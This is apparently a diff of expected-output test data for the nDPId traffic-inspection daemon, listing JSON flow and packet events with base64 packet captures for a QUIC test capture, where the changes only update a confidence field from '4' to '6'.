T+p8gpO0GzoZC+lIbATWgjqE\/P\/wDIp6NdKYeA+8geSI7YZP4nWfDgSoIHZphZHbocFnUUiNrBJ+JtQJCV1GcW2T5EMvwWWQ+zc5iC76n0qfV0F8WZ0UcVFvIhbjTEkm5tN09Sz35bubHZC7borBe9wGaBdUWuvbDKcYxKkDlCqHQh6sGHMEZvO8ITeoApd4s+sy32VthAMZfwzAkcp543Nd9arJlBQRns5ovQ74CEqV\/1SFXZ6AcxWiYbvYtKsu\/PXbKxEWRX\/bLqtCaRALrGa7LpwKvTT+nAPIfY1QuCMkJVs1njoj7EW\/n+6IFSplTtx1+YI+f46mZhIFNeEaX2QhADqN3oRrKwNDIyXpLg42uHmw6eyK87UJQsPtU8fbi0YLvgdhwLKYwc26rmYVcgZA2atbyib2Uj5alm78AkDkA5B6DNcz26jK7Xdi7HuV2TaALNudIatJBaYrNO2BlOvKywUaBJyggz39eP2g7XmeWd3aYE1aVTmJh\/X5Qlrz9C2EIg7WTIcETGQEy8F90A79pH7Soo5GcuPSyFrXtm5pfyZ8ekVtDas4uVjKMf\/55+t6uPRCl+GGDV091JgGbVqRR+qTbedv71GzRsoHrnHdTCw0\/6n5hRMqNjCHohMyyw+z8G1vmqSYMeQSMcWwzZON\/Jpnf2+CCqG3a7qlN1pPPkFyQhCllDNBRGdLWESKJhwxAioLHXjcdaXMywR8L7AS4Q2pkh1vrE4OB5IkU5Akg+78J9kzElSj\/7UWmlJ1BP49+zt9iG1OkS+1eOA9H1HXTQnB3rdU7jlLnCc+mS9YO5piXufWtmGBMHav\/cH2i1z7Nj\/YeOefBJDB6J9Vay5mTPGEHAWOZWU35b1ecCTk0q59LDDSBSuCpCzIgENLQ9BsmRpTJ1p\/5t5pYrOotQhCsIUt4ZYseRcaE"} -00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621425498439,"flow_last_seen":1621425498439,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621425498439,"l3_proto":"ip4","src_ip":"10.117.78.100","dst_ip":"251.236.18.198","src_port":44252,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"accounts.google.com","user_agent":"dev Chrome\/92.0.4503.0 Android 10; STK-L21","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 
-00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1621421253470,"flow_last_seen":1621421253804,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621425498439,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"212.22.246.243","src_port":55376,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1621421253509,"flow_last_seen":1621421253809,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621425498439,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"133.202.76.105","src_port":64964,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
-00741{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1621421260215,"flow_last_seen":1621421260513,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621425498439,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"37.47.218.224","src_port":59827,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} -00741{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1621421316093,"flow_last_seen":1621421316389,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621425498439,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"241.138.147.133","src_port":51053,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 
-00739{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621421257105,"flow_last_seen":1621421257105,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621425498439,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"112.1.105.138","src_port":55844,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} +00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621425498439,"flow_last_seen":1621425498439,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621425498439,"l3_proto":"ip4","src_ip":"10.117.78.100","dst_ip":"251.236.18.198","src_port":44252,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"accounts.google.com","user_agent":"dev Chrome\/92.0.4503.0 Android 10; STK-L21","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 
+00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1621421253470,"flow_last_seen":1621421253804,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621425498439,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"212.22.246.243","src_port":55376,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1621421253509,"flow_last_seen":1621421253809,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621425498439,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"133.202.76.105","src_port":64964,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
+00741{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1621421260215,"flow_last_seen":1621421260513,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621425498439,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"37.47.218.224","src_port":59827,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} +00741{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1621421316093,"flow_last_seen":1621421316389,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621425498439,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"241.138.147.133","src_port":51053,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 
+00739{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621421257105,"flow_last_seen":1621421257105,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621425498439,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"112.1.105.138","src_port":55844,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621425516873,"flow_last_seen":1621425516873,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621425516873,"l3_proto":"ip4","src_ip":"10.117.78.100","dst_ip":"202.152.155.121","src_port":55273,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1621425516873,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621425516873,"pkt":"AAAAAAAAAAEAaACzCABFAAVi\/6ZAAEARdvkKdU5kypibedfpAbsFTqmnyf8AAB0IsJwtqP2LOOwAAEU0PbMNV+Nmu5DIBUiD5lV4SUmkAFIOJpUhquUbkJoyjAxBM3gtgG81k6lhzA3GQE8tVB\/S296\/Vm2Zxaenrapxc2ryyJf3KX33MoNtBeSuxOyEjdN50pJD4IMrhuAo8nfxKG6fLj9F7lLvICTV\/vlkHUn8yq3RpGdoDFOYvOtuCt1zawf8weQRnfp4xT1kOhHEDxHVv3bNZbM5nRRJXxXGUaGOz22milo75Yy260QtHR4aoaeFIln1kEu0Lim1RK2gIG3MjkVIIfGYE828l6gKFLAUfvWyTEYYCubVd8+CKJEzaO\/afD6oH5Y+bKAztlPySihidV\/90CKHnjQSRTY+hapGYGfImwKn+7gwJ0y8ENI6zq2Ih7o8GVIuZBwsmgHPKVoI\/krv0+O9osznOQz68C3vRsk1lna2++Eh\/eGS6oVNvaQ9HWU8IOAO+hUpNSDAIpk8z853xu8BoWAYiv13BqICJAyIWzO+XisJ7ZDbQazmstS1X4Ro4beEy\/NpDmgrHs\/2pa7Zx6xAb0+3G7FsuNHBfazEIqD5ZaxPUSzBN2h9+9XzJ8MjsV2QQaUNPKl5I3TcN6uLucyXyzoKtyZvx5m9Myxjpit2V2hvKZoZMAufeIdZgn3bjdomXrscSN1kh89eZFiv+8sYO520yhiz9Evn\/LyuQ4s3jZpT\/D2t8PxQoF8xBbRM4zYc7mLtB7P7mWuCpbELISFHcTd1dWZWKO0foIWL29u+grT0xfq4G03G5Sdlh6g1Tl76tw8ffNRyJI3B1Zll6LpvOOT++553ZZZqQa3dmFoR3AuvZwf2iw+7omds46sgvQhiRN4h3ZF2B3hT0H553qSfJVf4VpupfglxjFiuInrFgySWKfAzXArMN+oCMOC4SKZEMeUovKPTvnb6vai123eTNft\/vwXrMQQqNDZKuK5WJP9n6bql9xt+K6gqLuWDibIsa7IxJZOdak6WDJKf6u4rc9CLeCfpZ+GDha\/Ykxp0z9I7MyUvNbVkIJM\/\/ALKQXgF9YFg335wWbGJ8oeev0cFKhtD7JCQbdZz00KdQoKXGN+waVJ8KTPJCUvnXb3d0W4Fg26R\/P47ckP8VwYPQ0fWuFNGOND8uFBwF\/d3ueP0Anz4sfSw9hA0aszUtBllmz+NjVBZMaAVseucfSE9+FWtSW\/KsQybDuj9Hdnq3g3OWz1pqPNSI+HFuqWF8kQGfGwENovGwhVwKpXQnz+0BZTlc82FjLmWo7drbFueC+RSI7H7oib+IE4+I2hWvpUn3YTZ1WyrdeA0MBi5AqQOhNsHHnx76MGBKrRzlZllpZzmHpoD\/tJSEv6IBAqZAZIHyZYvETkvTQebRoyNKdTyTMYAOlqQcbtY58suf6NwY93EpSSHoAyvs7u6S34KR7j2gnjKUKqgaZ32XDZAiXBl6uHxguSNnHz\/0gic4akOjaNW1y36lv+MwNLpamJSA75xsY0Ag\/ayv1t
DPlRq0SFYoyH\/L4BlSlxyXIpBXn6HDmzCBeqGRk\/SbP7MBhn1lhwnTyawxEZ\/gU0YfWVdkDqqI72zLJMAeO\/wRg13JYd2UqEyV84a2Jfyk1r4cyt9C7F0rhWFGR205l4xStcaYSinxImLl2pCKe5S2JSrskLuMGU92EeDCBi302RtMnd+pZkhUc\/dfq97n6+ubGkMSI0oohIfiZeWDID8SxamWtQv5ESk0SKFBP\/pMhJHpgeg965DR9H2osi8d4eJR+qyOMZCz7jHyZcC9RS2+yrCjEv3U9YnBDp5bAPDFrSnEw7i"} -00928{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621425516873,"flow_last_seen":1621425516873,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621425516873,"l3_proto":"ip4","src_ip":"10.117.78.100","dst_ip":"202.152.155.121","src_port":55273,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clients4.google.com","user_agent":"dev Chrome\/92.0.4503.0 Android 10; STK-L21","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00928{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621425516873,"flow_last_seen":1621425516873,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621425516873,"l3_proto":"ip4","src_ip":"10.117.78.100","dst_ip":"202.152.155.121","src_port":55273,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"clients4.google.com","user_agent":"dev Chrome\/92.0.4503.0 Android 10; STK-L21","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00598{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":20,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":20,"packets-processed":19,"total-skipped-flows":0,"total-l4-payload-len":25650,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":9,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":9,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":47,"global_ts_msec":1621431299729} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431299729,"flow_last_seen":1621431299729,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431299729,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":53404,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1621431299729,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431299729,"pkt":"AAAAAAAAAAEAWIVLCABFAAVi+ktAAH4RGLyokEAFcfqJ89CcAbsFTkRlzP8AAB0IlfQu+B7a8qcAAEU0VAXtGbQ9llSdlBvWDRqBCRlkCr+wLAODpb6IkSqrNtQT0Fq+mFTNNcZuGPLGmtMQiTgX5ahNfvwc2wVeVnwpjQXgMuY9BTiBvljI8vW2WO7xkdJk5ldSQUgRVPQ66OOPIEevYhWr2qgdtK3s4RlbCBiOUHL2oc6mNd7wOVC5XPDLU15Pb1X9rKGpYODdHEw2PCdUqXQXbRHNCTvR++4cDKRlcnhpPvs6EU838tX9PcKuOpDKMkxV6FLY+fNJwo9tnmW2kblEbFsqwJpz\/\/Enxa34NjqtoZhoRtapSyZCnEvopODqREJ\/CbRey4CQrv2fnFjjq7IR9A9vEDzcPpksson3AN1P3XrLmYYoaUkTGHOgCdje7SEGLDVSb4npjqySIO7wN8vp5rSPM5nARZ1XOT9wXoHff7cCe+dyL08HzUnnLJyBinNLpzvNbCMm0QKhi69Iq30GgBOKJqAZysRaQ5GV4Mf0wvX77rFCRRa9yldcwD6XOuyQdNUHPUQ0mVgJn1umvmeNPG6nKZjJq\/KGBx7ctS+gpvFQ1y0aJegnLzsDI2wvLLmhR9R3DiAgytDTiAvkU65nFAyo+x3w4ph5M+o6WWzbbtjsrAAu780wrME3zeXVEG9zm\/D3uptFTZsQMrWiuAaPVLf96rTs6qYSSYT7sYTWl\/jdhLBcFgFDy19mw2Lkw0oDKrrArHJ7yFnHUJtANtQ21TmcvxB\/WIjHCz8GMrDUZLO4OL+1Z7DeRFozavYMggt1qJ8U9KCvWBAR23kR921lFVt6a6RAQr\/I7jLU7sxhNgbORnVRfOZ1MAqQI8IIaWCq4xYmb6WmBUSzoH5\/13r8jfLuzIL6b1\/1xuyK1tWaBwjxQ8cdpzOSdWlwWGTU85r1MWsmvvgBLQno8RQ+AAeZUXr\/6vclKA8Bkt5OZC6F\/+bo8hifoSORQrzeJzJJiiI5FanBwgqgIUFyRIOqxcbjrI0ERcNvwqyjkLLqGLsY7p23bRBCZkGYLR28zH0LBHV0E4a0nhRGBk0f+KMOczC6ffG4xUK4QqemNWTyR\/91lj1denqDLOozFi3s9mCEzX4+yJyt3koNWJYF5um+Cu3rUa5kiznDT4nkKCPucW47nzSCmVao4V886qRx5Fx0iQIhZYySPa1r\/WDeHAaJOfFYJVkJKXBVWbzBAEax6q6reJe4QC08bU5\/zqLbaU3p3TETZVXEWcMzHKQD+xmaiYax8+gqDaZYIyifU0NKnlhkl+knTdJdHOJGncWgecX7cZ8apFuaDFx8UDXeMSrVUMSg8izndsoloQROpF\/aZqcH\/OCBifGVJlyfDkwFvsOr8tK54nIg\/1cnqgMA7cZTlQOsYpxuCu2jMiDpXOfrkKeU1g7FA9f\/QLEQ71aZKG1rpKfo9DX1OvCkAat37rPibslfUdCAi0gtEzi+ed4jZsjTTtLfHjE42gsT3p0neSGtZDGwREWKTcya3MwMk
r8y\/d3DdqmakPpf5GYFqWV3fR7TgU6cIOopkRSOcFKjDEWelXif4mHkRTG6rwTb+56lZ51kKqq1jDvERvqFEW5JginMwKZ\/lD3mwE4WQG\/o+y40DQu\/5PR3r5bhM1VHKHeN3CJnGug5p\/ZJp53IP681sF51Qt5pS8LzCO+rVnGa1rCOauVjEFEOyPp7wndr4g313ytaLKjzfjG8HveWQnAWD3q5pxGlBUxjPmLLEeKM1hHQLZMxXASZ2IisfUFkbyzFIAfCK09zSR6oQTD3gwuOcTrdJpdr\/4oePdnzAHWZa\/8h"} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431299729,"flow_last_seen":1621431299729,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431299729,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":53404,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"update.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431299729,"flow_last_seen":1621431299729,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431299729,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":53404,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"update.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431301735,"flow_last_seen":1621431301735,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431301735,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":53431,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02311{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1621431301735,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431301735,"pkt":"AAAAAAAAAAEAIHu5CABFAAViFJlAAH4RYWOokEAFgPgYAdC3AbsFTjagy\/8AAB0I1Sc982lv31UAAEU0GEDsnXM1346f3LKi+0ayIgknr4Rq\/qs0KnGSjmOfgKkNQLp8xEER9Qne8K9Dj4EYthFazH8nwogOlBFgQV5y3Fel1wV8LOfanwEdPEJ1ZJp+4xJmJEH3ze6GZ4lwHZsbcqCDQrzxSxyr8toIULGu2G\/50l56HzZwoikffxbY+R49tRZw4KX0e9zURynZK56t+njmlBuQWU+smCZVyJ9ypPFqKVXN7S\/8ucoFZ1YyJMN\/N8kqlm3ji7IGbOPNlw7irQvJ6BBxEwQlUJMHY0WKWUxD0Eb1MsXzLo9XO22gWFU3joZpaiSrB\/RDWZ1rp1Hfn0Ci0a8\/o47LT17Bf3EWgNA6oe86KkT1J6TFj5TGCEop\/KtIZTLdJ31PosLBOaXCkGm7G3FNW0bcjpPN+DwH3F\/o5LJ+Jg6E3+JR3af\/NqmM5lUPNhBagosvNZLci5aDdihLZLOTUxbxzA1HCgT\/ERn0TtIo+cvYtDBmA42xHr7Zw91voifBIp9+1r9Wgz2+fhJw6YMkrw\/R0ppcnpZJDX0HcDeOv1QITYaPEMCvPZWtVD56xX\/nIyNhER8spzpXJhfyZ7CLt2MQTJZYrSynYdh2Qhg0W\/N
nv+YnvHUimL5v9ucOAhisPrHZU6G8ccZVN9RPBkZp7we5VOgt\/sHvnaKFG385oGUa113YRpL+yC9+apyL7k0Lf9A9mH6jbSNwop0gbOz\/dSwao004T49FUKY+MYQSd1ZqRfOYZDWWvt4Z1+VpWWL9e3bLpDjurtDY1UVq7\/zyqXdPda+dj4dfpiumFbn95kie6gTbq0Ka77SOEVLy4F0R2VJz0mF6y8BHF7y+\/LWrLPikezYLBu3wp4yKo5ZMD+1RhjR0eYSiFStCQDoyh1ZzHLZrZgvvFV+EGsEUegku5d6U\/1xaEg70OUXkUj8MuVqNGP\/DVAWz6hGuIclLJHMXkZa1w4sqgXxuwiLhqmwpSjmxq15zo0Z6Ez9\/3O8teBesxAzKjLPt8Sjolvyd5nkwqOheF9hPlho5\/02ZAOHIA3HyHiqD0gFnqO5U5vPI269ren0HJGp9Y0aGm+Qy9oejwYJQfgaxeUOqcA7NVscX+RDbbgM1ZMcwzqUnM9YjlXsn6y6NTYw1rNff1zxlhQ08vVArWM2OumIoI++kTKQEg4JkAXQ3sxDPGAMMWQm14xHh1lESh4xPo3UHq2rynANu5+mkgpLsBsJIGzZOygMCZkmyp2fh7iY52BUb4Nx03epPzl6T\/HG2GNWULvucC8GPWEvPtkSLn35wNxlzF8NXX5lfbR6AqMs5QTbFYMg5BCH46iFuJgeJdSeBSv2NIL6sAH5f5tl5FrSe6SEykjojnE+KA8Pu32tMRLNHQvsRLkoRsuGCZmn0vJNgxR0Qj2ZnmdeI9WNinCOb\/TQqf05ttvs0B8SkG2JbukXe8IPAXK8CE2z3vwPoWYB2uzq10A+1l82xFsU23TRP69q5AjAR5gcBo2onzoy0h+\/Fh3MjRkS2rWgW2gbyo49\/6o+6I9tCoTl8e+t8H5Hr7OKKf7UKw0\/fDzsw6vvWL7Z180IeAQRORtYOnhVfjSCcEhIA8M4QlGvZG+XDbkn0clOXH6LrYUiHVBMh0